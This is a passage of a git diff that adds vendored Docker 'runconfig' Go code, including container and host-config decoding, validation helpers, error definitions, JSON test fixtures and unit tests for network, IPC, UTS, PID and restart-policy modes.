+// validateMountSettings validates each of the volumes and bind settings
+// passed by the caller to ensure they are valid.
+func validateMountSettings(c *container.Config, hc *container.HostConfig) error {
+	// it is ok to have len(hc.Mounts) > 0 && (len(hc.Binds) > 0 || len (c.Volumes) > 0 || len (hc.Tmpfs) > 0 )
+
+	// Ensure all volumes and binds are valid.
+	for spec := range c.Volumes {
+		if _, err := volume.ParseMountRaw(spec, hc.VolumeDriver); err != nil {
+			return fmt.Errorf("invalid volume spec %q: %v", spec, err)
+		}
+	}
+	for _, spec := range hc.Binds {
+		if _, err := volume.ParseMountRaw(spec, hc.VolumeDriver); err != nil {
+			return fmt.Errorf("invalid bind mount spec %q: %v", spec, err)
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/runconfig/config_test.go b/vendor/github.com/docker/docker/runconfig/config_test.go
new file mode 100644
index 0000000000..f1f9de5950
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/config_test.go
@@ -0,0 +1,139 @@
+package runconfig
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"runtime"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/container"
+	networktypes "github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/api/types/strslice"
+)
+
+type f struct {
+	file       string
+	entrypoint strslice.StrSlice
+}
+
+func TestDecodeContainerConfig(t *testing.T) {
+
+	var (
+		fixtures []f
+		image    string
+	)
+
+	//TODO: Should run for Solaris
+	if runtime.GOOS == "solaris" {
+		t.Skip()
+	}
+
+	if runtime.GOOS != "windows" {
+		image = "ubuntu"
+		fixtures = []f{
+			{"fixtures/unix/container_config_1_14.json", strslice.StrSlice{}},
+			{"fixtures/unix/container_config_1_17.json", strslice.StrSlice{"bash"}},
+			{"fixtures/unix/container_config_1_19.json", strslice.StrSlice{"bash"}},
+		}
+	} else {
+		image = "windows"
+		fixtures = []f{
+			{"fixtures/windows/container_config_1_19.json", strslice.StrSlice{"cmd"}},
+		}
+	}
+
+	for _, f := range fixtures {
+		b, err := ioutil.ReadFile(f.file)
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		c, h, _, err := DecodeContainerConfig(bytes.NewReader(b))
+		if err != nil {
+			t.Fatal(fmt.Errorf("Error parsing %s: %v", f, err))
+		}
+
+		if c.Image != image {
+			t.Fatalf("Expected %s image, found %s\n", image, c.Image)
+		}
+
+		if len(c.Entrypoint) != len(f.entrypoint) {
+			t.Fatalf("Expected %v, found %v\n", f.entrypoint, c.Entrypoint)
+		}
+
+		if h != nil && h.Memory != 1000 {
+			t.Fatalf("Expected memory to be 1000, found %d\n", h.Memory)
+		}
+	}
+}
+
+// TestDecodeContainerConfigIsolation validates isolation passed
+// to the daemon in the hostConfig structure. Note this is platform specific
+// as to what level of container isolation is supported.
+func TestDecodeContainerConfigIsolation(t *testing.T) {
+
+	// An invalid isolation level
+	if _, _, _, err := callDecodeContainerConfigIsolation("invalid"); err != nil {
+		if !strings.Contains(err.Error(), `invalid --isolation: "invalid"`) {
+			t.Fatal(err)
+		}
+	}
+
+	// Blank isolation (== default)
+	if _, _, _, err := callDecodeContainerConfigIsolation(""); err != nil {
+		t.Fatal("Blank isolation should have succeeded")
+	}
+
+	// Default isolation
+	if _, _, _, err := callDecodeContainerConfigIsolation("default"); err != nil {
+		t.Fatal("default isolation should have succeeded")
+	}
+
+	// Process isolation (Valid on Windows only)
+	if runtime.GOOS == "windows" {
+		if _, _, _, err := callDecodeContainerConfigIsolation("process"); err != nil {
+			t.Fatal("process isolation should have succeeded")
+		}
+	} else {
+		if _, _, _, err := callDecodeContainerConfigIsolation("process"); err != nil {
+			if !strings.Contains(err.Error(), `invalid --isolation: "process"`) {
+				t.Fatal(err)
+			}
+		}
+	}
+
+	// Hyper-V Containers isolation (Valid on Windows only)
+	if runtime.GOOS == "windows" {
+		if _, _, _, err := callDecodeContainerConfigIsolation("hyperv"); err != nil {
+			t.Fatal("hyperv isolation should have succeeded")
+		}
+	} else {
+		if _, _, _, err := callDecodeContainerConfigIsolation("hyperv"); err != nil {
+			if !strings.Contains(err.Error(), `invalid --isolation: "hyperv"`) {
+				t.Fatal(err)
+			}
+		}
+	}
+}
+
+// callDecodeContainerConfigIsolation is a utility function to call
+// DecodeContainerConfig for validating isolation
+func callDecodeContainerConfigIsolation(isolation string) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) {
+	var (
+		b   []byte
+		err error
+	)
+	w := ContainerConfigWrapper{
+		Config: &container.Config{},
+		HostConfig: &container.HostConfig{
+			NetworkMode: "none",
+			Isolation:   container.Isolation(isolation)},
+	}
+	if b, err = json.Marshal(w); err != nil {
+		return nil, nil, nil, fmt.Errorf("Error on marshal %s", err.Error())
+	}
+	return DecodeContainerConfig(bytes.NewReader(b))
+}
diff --git a/vendor/github.com/docker/docker/runconfig/config_unix.go b/vendor/github.com/docker/docker/runconfig/config_unix.go
new file mode 100644
index 0000000000..4ccfc73be2
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/config_unix.go
@@ -0,0 +1,59 @@
+// +build !windows
+
+package runconfig
+
+import (
+	"github.com/docker/docker/api/types/container"
+	networktypes "github.com/docker/docker/api/types/network"
+)
+
+// ContainerConfigWrapper is a Config wrapper that holds the container Config (portable)
+// and the corresponding HostConfig (non-portable).
+type ContainerConfigWrapper struct {
+	*container.Config
+	InnerHostConfig       *container.HostConfig          `json:"HostConfig,omitempty"`
+	Cpuset                string                         `json:",omitempty"` // Deprecated. Exported for backwards compatibility.
+	NetworkingConfig      *networktypes.NetworkingConfig `json:"NetworkingConfig,omitempty"`
+	*container.HostConfig                                // Deprecated. Exported to read attributes from json that are not in the inner host config structure.
+}
+
+// getHostConfig gets the HostConfig of the Config.
+// It's mostly there to handle Deprecated fields of the ContainerConfigWrapper
+func (w *ContainerConfigWrapper) getHostConfig() *container.HostConfig {
+	hc := w.HostConfig
+
+	if hc == nil && w.InnerHostConfig != nil {
+		hc = w.InnerHostConfig
+	} else if w.InnerHostConfig != nil {
+		if hc.Memory != 0 && w.InnerHostConfig.Memory == 0 {
+			w.InnerHostConfig.Memory = hc.Memory
+		}
+		if hc.MemorySwap != 0 && w.InnerHostConfig.MemorySwap == 0 {
+			w.InnerHostConfig.MemorySwap = hc.MemorySwap
+		}
+		if hc.CPUShares != 0 && w.InnerHostConfig.CPUShares == 0 {
+			w.InnerHostConfig.CPUShares = hc.CPUShares
+		}
+		if hc.CpusetCpus != "" && w.InnerHostConfig.CpusetCpus == "" {
+			w.InnerHostConfig.CpusetCpus = hc.CpusetCpus
+		}
+
+		if hc.VolumeDriver != "" && w.InnerHostConfig.VolumeDriver == "" {
+			w.InnerHostConfig.VolumeDriver = hc.VolumeDriver
+		}
+
+		hc = w.InnerHostConfig
+	}
+
+	if hc != nil {
+		if w.Cpuset != "" && hc.CpusetCpus == "" {
+			hc.CpusetCpus = w.Cpuset
+		}
+	}
+
+	// Make sure NetworkMode has an acceptable value. We do this to ensure
+	// backwards compatible API behavior.
+	hc = SetDefaultNetModeIfBlank(hc)
+
+	return hc
+}
diff --git a/vendor/github.com/docker/docker/runconfig/config_windows.go b/vendor/github.com/docker/docker/runconfig/config_windows.go
new file mode 100644
index 0000000000..f2361b554b
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/config_windows.go
@@ -0,0 +1,19 @@
+package runconfig
+
+import (
+	"github.com/docker/docker/api/types/container"
+	networktypes "github.com/docker/docker/api/types/network"
+)
+
+// ContainerConfigWrapper is a Config wrapper that holds the container Config (portable)
+// and the corresponding HostConfig (non-portable).
+type ContainerConfigWrapper struct {
+	*container.Config
+	HostConfig       *container.HostConfig          `json:"HostConfig,omitempty"`
+	NetworkingConfig *networktypes.NetworkingConfig `json:"NetworkingConfig,omitempty"`
+}
+
+// getHostConfig gets the HostConfig of the Config.
+func (w *ContainerConfigWrapper) getHostConfig() *container.HostConfig {
+	return w.HostConfig
+}
diff --git a/vendor/github.com/docker/docker/runconfig/errors.go b/vendor/github.com/docker/docker/runconfig/errors.go
new file mode 100644
index 0000000000..bb72c1699c
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/errors.go
@@ -0,0 +1,46 @@
+package runconfig
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/errors"
+)
+
+var (
+	// ErrConflictContainerNetworkAndLinks conflict between --net=container and links
+	ErrConflictContainerNetworkAndLinks = fmt.Errorf("Conflicting options: container type network can't be used with links. This would result in undefined behavior")
+	// ErrConflictUserDefinedNetworkAndLinks conflict between --net=<NETWORK> and links
+	ErrConflictUserDefinedNetworkAndLinks = fmt.Errorf("Conflicting options: networking can't be used with links. This would result in undefined behavior")
+	// ErrConflictSharedNetwork conflict between private and other networks
+	ErrConflictSharedNetwork = fmt.Errorf("Container sharing network namespace with another container or host cannot be connected to any other network")
+	// ErrConflictHostNetwork conflict from being disconnected from host network or connected to host network.
+	ErrConflictHostNetwork = fmt.Errorf("Container cannot be disconnected from host network or connected to host network")
+	// ErrConflictNoNetwork conflict between private and other networks
+	ErrConflictNoNetwork = fmt.Errorf("Container cannot be connected to multiple networks with one of the networks in private (none) mode")
+	// ErrConflictNetworkAndDNS conflict between --dns and the network mode
+	ErrConflictNetworkAndDNS = fmt.Errorf("Conflicting options: dns and the network mode")
+	// ErrConflictNetworkHostname conflict between the hostname and the network mode
+	ErrConflictNetworkHostname = fmt.Errorf("Conflicting options: hostname and the network mode")
+	// ErrConflictHostNetworkAndLinks conflict between --net=host and links
+	ErrConflictHostNetworkAndLinks = fmt.Errorf("Conflicting options: host type networking can't be used with links. This would result in undefined behavior")
+	// ErrConflictContainerNetworkAndMac conflict between the mac address and the network mode
+	ErrConflictContainerNetworkAndMac = fmt.Errorf("Conflicting options: mac-address and the network mode")
+	// ErrConflictNetworkHosts conflict between add-host and the network mode
+	ErrConflictNetworkHosts = fmt.Errorf("Conflicting options: custom host-to-IP mapping and the network mode")
+	// ErrConflictNetworkPublishPorts conflict between the publish options and the network mode
+	ErrConflictNetworkPublishPorts = fmt.Errorf("Conflicting options: port publishing and the container type network mode")
+	// ErrConflictNetworkExposePorts conflict between the expose option and the network mode
+	ErrConflictNetworkExposePorts = fmt.Errorf("Conflicting options: port exposing and the container type network mode")
+	// ErrUnsupportedNetworkAndIP conflict between network mode and requested ip address
+	ErrUnsupportedNetworkAndIP = fmt.Errorf("User specified IP address is supported on user defined networks only")
+	// ErrUnsupportedNetworkNoSubnetAndIP conflict between network with no configured subnet and requested ip address
+	ErrUnsupportedNetworkNoSubnetAndIP = fmt.Errorf("User specified IP address is supported only when connecting to networks with user configured subnets")
+	// ErrUnsupportedNetworkAndAlias conflict between network mode and alias
+	ErrUnsupportedNetworkAndAlias = fmt.Errorf("Network-scoped alias is supported only for containers in user defined networks")
+	// ErrConflictUTSHostname conflict between the hostname and the UTS mode
+	ErrConflictUTSHostname = fmt.Errorf("Conflicting options: hostname and the UTS mode")
+)
+
+func conflictError(err error) error {
+	return errors.NewRequestConflictError(err)
+}
diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_14.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_14.json
new file mode 100644
index 0000000000..b08334c095
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_14.json
@@ -0,0 +1,30 @@
+{
+     "Hostname":"",
+     "Domainname": "",
+     "User":"",
+     "Memory": 1000,
+     "MemorySwap":0,
+     "CpuShares": 512,
+     "Cpuset": "0,1",
+     "AttachStdin":false,
+     "AttachStdout":true,
+     "AttachStderr":true,
+     "PortSpecs":null,
+     "Tty":false,
+     "OpenStdin":false,
+     "StdinOnce":false,
+     "Env":null,
+     "Cmd":[
+             "bash"
+     ],
+     "Image":"ubuntu",
+     "Volumes":{
+             "/tmp": {}
+     },
+     "WorkingDir":"",
+     "NetworkDisabled": false,
+     "ExposedPorts":{
+             "22/tcp": {}
+     },
+     "RestartPolicy": { "Name": "always" }
+}
diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_17.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_17.json
new file mode 100644
index 0000000000..0d780877b4
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_17.json
@@ -0,0 +1,50 @@
+{
+     "Hostname": "",
+     "Domainname": "",
+     "User": "",
+     "Memory": 1000,
+     "MemorySwap": 0,
+     "CpuShares": 512,
+     "Cpuset": "0,1",
+     "AttachStdin": false,
+     "AttachStdout": true,
+     "AttachStderr": true,
+     "Tty": false,
+     "OpenStdin": false,
+     "StdinOnce": false,
+     "Env": null,
+     "Cmd": [
+             "date"
+     ],
+     "Entrypoint": "bash",
+     "Image": "ubuntu",
+     "Volumes": {
+             "/tmp": {}
+     },
+     "WorkingDir": "",
+     "NetworkDisabled": false,
+     "MacAddress": "12:34:56:78:9a:bc",
+     "ExposedPorts": {
+             "22/tcp": {}
+     },
+     "SecurityOpt": [""],
+     "HostConfig": {
+       "Binds": ["/tmp:/tmp"],
+       "Links": ["redis3:redis"],
+       "LxcConf": {"lxc.utsname":"docker"},
+       "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] },
+       "PublishAllPorts": false,
+       "Privileged": false,
+       "ReadonlyRootfs": false,
+       "Dns": ["8.8.8.8"],
+       "DnsSearch": [""],
+       "DnsOptions": [""],
+       "ExtraHosts": null,
+       "VolumesFrom": ["parent", "other:ro"],
+       "CapAdd": ["NET_ADMIN"],
+       "CapDrop": ["MKNOD"],
+       "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 },
+       "NetworkMode": "bridge",
+       "Devices": []
+    }
+}
diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_19.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_19.json
new file mode 100644
index 0000000000..de49cf3242
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_19.json
@@ -0,0 +1,58 @@
+{
+     "Hostname": "",
+     "Domainname": "",
+     "User": "",
+     "AttachStdin": false,
+     "AttachStdout": true,
+     "AttachStderr": true,
+     "Tty": false,
+     "OpenStdin": false,
+     "StdinOnce": false,
+     "Env": null,
+     "Cmd": [
+             "date"
+     ],
+     "Entrypoint": "bash",
+     "Image": "ubuntu",
+     "Labels": {
+             "com.example.vendor": "Acme",
+             "com.example.license": "GPL",
+             "com.example.version": "1.0"
+     },
+     "Volumes": {
+             "/tmp": {}
+     },
+     "WorkingDir": "",
+     "NetworkDisabled": false,
+     "MacAddress": "12:34:56:78:9a:bc",
+     "ExposedPorts": {
+             "22/tcp": {}
+     },
+     "HostConfig": {
+       "Binds": ["/tmp:/tmp"],
+       "Links": ["redis3:redis"],
+       "LxcConf": {"lxc.utsname":"docker"},
+       "Memory": 1000,
+       "MemorySwap": 0,
+       "CpuShares": 512,
+       "CpusetCpus": "0,1",
+       "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] },
+       "PublishAllPorts": false,
+       "Privileged": false,
+       "ReadonlyRootfs": false,
+       "Dns": ["8.8.8.8"],
+       "DnsSearch": [""],
+       "DnsOptions": [""],
+       "ExtraHosts": null,
+       "VolumesFrom": ["parent", "other:ro"],
+       "CapAdd": ["NET_ADMIN"],
+       "CapDrop": ["MKNOD"],
+       "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 },
+       "NetworkMode": "bridge",
+       "Devices": [],
+       "Ulimits": [{}],
+       "LogConfig": { "Type": "json-file", "Config": {} },
+       "SecurityOpt": [""],
+       "CgroupParent": ""
+    }
+}
diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_14.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_14.json
new file mode 100644
index 0000000000..c72ac91cab
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_14.json
@@ -0,0 +1,18 @@
+{
+    "Binds": ["/tmp:/tmp"],
+    "ContainerIDFile": "",
+    "LxcConf": [],
+    "Privileged": false,
+    "PortBindings": {
+        "80/tcp": [
+            {
+                "HostIp": "0.0.0.0",
+                "HostPort": "49153"
+            }
+        ]
+    },
+    "Links": ["/name:alias"],
+    "PublishAllPorts": false,
+    "CapAdd": ["NET_ADMIN"],
+    "CapDrop": ["MKNOD"]
+}
diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_19.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_19.json
new file mode 100644
index 0000000000..5ca8aa7e19
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_19.json
@@ -0,0 +1,30 @@
+{
+    "Binds": ["/tmp:/tmp"],
+    "Links": ["redis3:redis"],
+    "LxcConf": {"lxc.utsname":"docker"},
+    "Memory": 0,
+    "MemorySwap": 0,
+    "CpuShares": 512,
+    "CpuPeriod": 100000,
+    "CpusetCpus": "0,1",
+    "CpusetMems": "0,1",
+    "BlkioWeight": 300,
+    "OomKillDisable": false,
+    "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] },
+    "PublishAllPorts": false,
+    "Privileged": false,
+    "ReadonlyRootfs": false,
+    "Dns": ["8.8.8.8"],
+    "DnsSearch": [""],
+    "ExtraHosts": null,
+    "VolumesFrom": ["parent", "other:ro"],
+    "CapAdd": ["NET_ADMIN"],
+    "CapDrop": ["MKNOD"],
+    "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 },
+    "NetworkMode": "bridge",
+    "Devices": [],
+    "Ulimits": [{}],
+    "LogConfig": { "Type": "json-file", "Config": {} },
+    "SecurityOpt": [""],
+    "CgroupParent": ""
+}
diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/windows/container_config_1_19.json b/vendor/github.com/docker/docker/runconfig/fixtures/windows/container_config_1_19.json
new file mode 100644
index 0000000000..724320c760
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/fixtures/windows/container_config_1_19.json
@@ -0,0 +1,58 @@
+{
+     "Hostname": "",
+     "Domainname": "",
+     "User": "",
+     "AttachStdin": false,
+     "AttachStdout": true,
+     "AttachStderr": true,
+     "Tty": false,
+     "OpenStdin": false,
+     "StdinOnce": false,
+     "Env": null,
+     "Cmd": [
+             "date"
+     ],
+     "Entrypoint": "cmd",
+     "Image": "windows",
+     "Labels": {
+             "com.example.vendor": "Acme",
+             "com.example.license": "GPL",
+             "com.example.version": "1.0"
+     },
+     "Volumes": {
+             "c:/windows": {}
+     },
+     "WorkingDir": "",
+     "NetworkDisabled": false,
+     "MacAddress": "12:34:56:78:9a:bc",
+     "ExposedPorts": {
+             "22/tcp": {}
+     },
+     "HostConfig": {
+       "Binds": ["c:/windows:d:/tmp"],
+       "Links": ["redis3:redis"],
+       "LxcConf": {"lxc.utsname":"docker"},
+       "Memory": 1000,
+       "MemorySwap": 0,
+       "CpuShares": 512,
+       "CpusetCpus": "0,1",
+       "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] },
+       "PublishAllPorts": false,
+       "Privileged": false,
+       "ReadonlyRootfs": false,
+       "Dns": ["8.8.8.8"],
+       "DnsSearch": [""],
+       "DnsOptions": [""],
+       "ExtraHosts": null,
+       "VolumesFrom": ["parent", "other:ro"],
+       "CapAdd": ["NET_ADMIN"],
+       "CapDrop": ["MKNOD"],
+       "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 },
+       "NetworkMode": "default",
+       "Devices": [],
+       "Ulimits": [{}],
+       "LogConfig": { "Type": "json-file", "Config": {} },
+       "SecurityOpt": [""],
+       "CgroupParent": ""
+    }
+}
diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig.go b/vendor/github.com/docker/docker/runconfig/hostconfig.go
new file mode 100644
index 0000000000..2b81d02c20
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/hostconfig.go
@@ -0,0 +1,35 @@
+package runconfig
+
+import (
+	"encoding/json"
+	"io"
+
+	"github.com/docker/docker/api/types/container"
+)
+
+// DecodeHostConfig creates a HostConfig based on the specified Reader.
+// It assumes the content of the reader will be JSON, and decodes it.
+func DecodeHostConfig(src io.Reader) (*container.HostConfig, error) {
+	decoder := json.NewDecoder(src)
+
+	var w ContainerConfigWrapper
+	if err := decoder.Decode(&w); err != nil {
+		return nil, err
+	}
+
+	hc := w.getHostConfig()
+	return hc, nil
+}
+
+// SetDefaultNetModeIfBlank changes the NetworkMode in a HostConfig structure
+// to default if it is not populated. This ensures backwards compatibility after
+// the validation of the network mode was moved from the docker CLI to the
+// docker daemon.
+func SetDefaultNetModeIfBlank(hc *container.HostConfig) *container.HostConfig {
+	if hc != nil {
+		if hc.NetworkMode == container.NetworkMode("") {
+			hc.NetworkMode = container.NetworkMode("default")
+		}
+	}
+	return hc
+}
diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go b/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go
new file mode 100644
index 0000000000..83ad32ecc7
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go
@@ -0,0 +1,41 @@
+package runconfig
+
+import (
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/pkg/sysinfo"
+)
+
+// DefaultDaemonNetworkMode returns the default network stack the daemon should
+// use.
+func DefaultDaemonNetworkMode() container.NetworkMode {
+	return container.NetworkMode("bridge")
+}
+
+// IsPreDefinedNetwork indicates if a network is predefined by the daemon
+func IsPreDefinedNetwork(network string) bool {
+	return false
+}
+
+// ValidateNetMode ensures that the various combinations of requested
+// network settings are valid.
+func ValidateNetMode(c *container.Config, hc *container.HostConfig) error {
+	// We may not be passed a host config, such as in the case of docker commit
+	return nil
+}
+
+// ValidateIsolation performs platform specific validation of the
+// isolation level in the hostconfig structure.
+// This setting is currently discarded for Solaris so this is a no-op.
+func ValidateIsolation(hc *container.HostConfig) error {
+	return nil
+}
+
+// ValidateQoS performs platform specific validation of the QoS settings
+func ValidateQoS(hc *container.HostConfig) error {
+	return nil
+}
+
+// ValidateResources performs platform specific validation of the resource settings
+func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_test.go b/vendor/github.com/docker/docker/runconfig/hostconfig_test.go
new file mode 100644
index 0000000000..a6a2b34fc1
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/hostconfig_test.go
@@ -0,0 +1,283 @@
+// +build !windows
+
+package runconfig
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"testing"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/pkg/sysinfo"
+)
+
+// TODO Windows: This will need addressing for a Windows daemon.
+func TestNetworkModeTest(t *testing.T) {
+	networkModes := map[container.NetworkMode][]bool{
+		// private, bridge, host, container, none, default
+		"":                         {true, false, false, false, false, false},
+		"something:weird":          {true, false, false, false, false, false},
+		"bridge":                   {true, true, false, false, false, false},
+		DefaultDaemonNetworkMode(): {true, true, false, false, false, false},
+		"host":           {false, false, true, false, false, false},
+		"container:name": {false, false, false, true, false, false},
+		"none":           {true, false, false, false, true, false},
+		"default":        {true, false, false, false, false, true},
+	}
+	networkModeNames := map[container.NetworkMode]string{
+		"":                         "",
+		"something:weird":          "something:weird",
+		"bridge":                   "bridge",
+		DefaultDaemonNetworkMode(): "bridge",
+		"host":           "host",
+		"container:name": "container",
+		"none":           "none",
+		"default":        "default",
+	}
+	for networkMode, state := range networkModes {
+		if networkMode.IsPrivate() != state[0] {
+			t.Fatalf("NetworkMode.IsPrivate for %v should have been %v but was %v", networkMode, state[0], networkMode.IsPrivate())
+		}
+		if networkMode.IsBridge() != state[1] {
+			t.Fatalf("NetworkMode.IsBridge for %v should have been %v but was %v", networkMode, state[1], networkMode.IsBridge())
+		}
+		if networkMode.IsHost() != state[2] {
+			t.Fatalf("NetworkMode.IsHost for %v should have been %v but was %v", networkMode, state[2], networkMode.IsHost())
+		}
+		if networkMode.IsContainer() != state[3] {
+			t.Fatalf("NetworkMode.IsContainer for %v should have been %v but was %v", networkMode, state[3], networkMode.IsContainer())
+		}
+		if networkMode.IsNone() != state[4] {
+			t.Fatalf("NetworkMode.IsNone for %v should have been %v but was %v", networkMode, state[4], networkMode.IsNone())
+		}
+		if networkMode.IsDefault() != state[5] {
+			t.Fatalf("NetworkMode.IsDefault for %v should have been %v but was %v", networkMode, state[5], networkMode.IsDefault())
+		}
+		if networkMode.NetworkName() != networkModeNames[networkMode] {
+			t.Fatalf("Expected name %v, got %v", networkModeNames[networkMode], networkMode.NetworkName())
+		}
+	}
+}
+
+func TestIpcModeTest(t *testing.T) {
+	ipcModes := map[container.IpcMode][]bool{
+		// private, host, container, valid
+		"":                         {true, false, false, true},
+		"something:weird":          {true, false, false, false},
+		":weird":                   {true, false, false, true},
+		"host":                     {false, true, false, true},
+		"container:name":           {false, false, true, true},
+		"container:name:something": {false, false, true, false},
+		"container:":               {false, false, true, false},
+	}
+	for ipcMode, state := range ipcModes {
+		if ipcMode.IsPrivate() != state[0] {
+			t.Fatalf("IpcMode.IsPrivate for %v should have been %v but was %v", ipcMode, state[0], ipcMode.IsPrivate())
+		}
+		if ipcMode.IsHost() != state[1] {
+			t.Fatalf("IpcMode.IsHost for %v should have been %v but was %v", ipcMode, state[1], ipcMode.IsHost())
+		}
+		if ipcMode.IsContainer() != state[2] {
+			t.Fatalf("IpcMode.IsContainer for %v should have been %v but was %v", ipcMode, state[2], ipcMode.IsContainer())
+		}
+		if ipcMode.Valid() != state[3] {
+			t.Fatalf("IpcMode.Valid for %v should have been %v but was %v", ipcMode, state[3], ipcMode.Valid())
+		}
+	}
+	containerIpcModes := map[container.IpcMode]string{
+		"":                      "",
+		"something":             "",
+		"something:weird":       "weird",
+		"container":             "",
+		"container:":            "",
+		"container:name":        "name",
+		"container:name1:name2": "name1:name2",
+	}
+	for ipcMode, container := range containerIpcModes {
+		if ipcMode.Container() != container {
+			t.Fatalf("Expected %v for %v but was %v", container, ipcMode, ipcMode.Container())
+		}
+	}
+}
+
+func TestUTSModeTest(t *testing.T) {
+	utsModes := map[container.UTSMode][]bool{
+		// private, host, valid
+		"":                {true, false, true},
+		"something:weird": {true, false, false},
+		"host":            {false, true, true},
+		"host:name":       {true, false, true},
+	}
+	for utsMode, state := range utsModes {
+		if utsMode.IsPrivate() != state[0] {
+			t.Fatalf("UtsMode.IsPrivate for %v should have been %v but was %v", utsMode, state[0], utsMode.IsPrivate())
+		}
+		if utsMode.IsHost() != state[1] {
+			t.Fatalf("UtsMode.IsHost for %v should have been %v but was %v", utsMode, state[1], utsMode.IsHost())
+		}
+		if utsMode.Valid() != state[2] {
+			t.Fatalf("UtsMode.Valid for %v should have been %v but was %v", utsMode, state[2], utsMode.Valid())
+		}
+	}
+}
+
+func TestUsernsModeTest(t *testing.T) {
+	usrensMode := map[container.UsernsMode][]bool{
+		// private, host, valid
+		"":                {true, false, true},
+		"something:weird": {true, false, false},
+		"host":            {false, true, true},
+		"host:name":       {true, false, true},
+	}
+	for usernsMode, state := range usrensMode {
+		if usernsMode.IsPrivate() != state[0] {
+			t.Fatalf("UsernsMode.IsPrivate for %v should have been %v but was %v", usernsMode, state[0], usernsMode.IsPrivate())
+		}
+		if usernsMode.IsHost() != state[1] {
+			t.Fatalf("UsernsMode.IsHost for %v should have been %v but was %v", usernsMode, state[1], usernsMode.IsHost())
+		}
+		if usernsMode.Valid() != state[2] {
+			t.Fatalf("UsernsMode.Valid for %v should have been %v but was %v", usernsMode, state[2], usernsMode.Valid())
+		}
+	}
+}
+
+func TestPidModeTest(t *testing.T) {
+	pidModes := map[container.PidMode][]bool{
+		// private, host, valid
+		"":                {true, false, true},
+		"something:weird": {true, false, false},
+		"host":            {false, true, true},
+		"host:name":       {true, false, true},
+	}
+	for pidMode, state := range pidModes {
+		if pidMode.IsPrivate() != state[0] {
+			t.Fatalf("PidMode.IsPrivate for %v should have been %v but was %v", pidMode, state[0], pidMode.IsPrivate())
+		}
+		if pidMode.IsHost() != state[1] {
+			t.Fatalf("PidMode.IsHost for %v should have been %v but was %v", pidMode, state[1], pidMode.IsHost())
+		}
+		if pidMode.Valid() != state[2] {
+			t.Fatalf("PidMode.Valid for %v should have been %v but was %v", pidMode, state[2], pidMode.Valid())
+		}
+	}
+}
+
+func TestRestartPolicy(t *testing.T) {
+	restartPolicies := map[container.RestartPolicy][]bool{
+		// none, always, failure
+		container.RestartPolicy{}:                {true, false, false},
+		container.RestartPolicy{"something", 0}:  {false, false, false},
+		container.RestartPolicy{"no", 0}:         {true, false, false},
+		container.RestartPolicy{"always", 0}:     {false, true, false},
+		container.RestartPolicy{"on-failure", 0}: {false, false, true},
+	}
+	for restartPolicy, state := range restartPolicies {
+		if restartPolicy.IsNone() != state[0] {
+			t.Fatalf("RestartPolicy.IsNone for %v should have been %v but was %v", restartPolicy, state[0], restartPolicy.IsNone())
+		}
+		if restartPolicy.IsAlways() != state[1] {
+			t.Fatalf("RestartPolicy.IsAlways for %v should have been %v but was %v", restartPolicy, state[1], restartPolicy.IsAlways())
+		}
+		if restartPolicy.IsOnFailure() != state[2] {
+			t.Fatalf("RestartPolicy.IsOnFailure for %v should have been %v but was %v", restartPolicy, state[2], restartPolicy.IsOnFailure())
+		}
+	}
+}
+func TestDecodeHostConfig(t *testing.T) {
+	fixtures := []struct {
+		file string
+	}{
+		{"fixtures/unix/container_hostconfig_1_14.json"},
+		{"fixtures/unix/container_hostconfig_1_19.json"},
+	}
+
+	for _, f := range fixtures {
+		b, err := ioutil.ReadFile(f.file)
+		if err != nil {
+			t.Fatal(err)
+		}
+
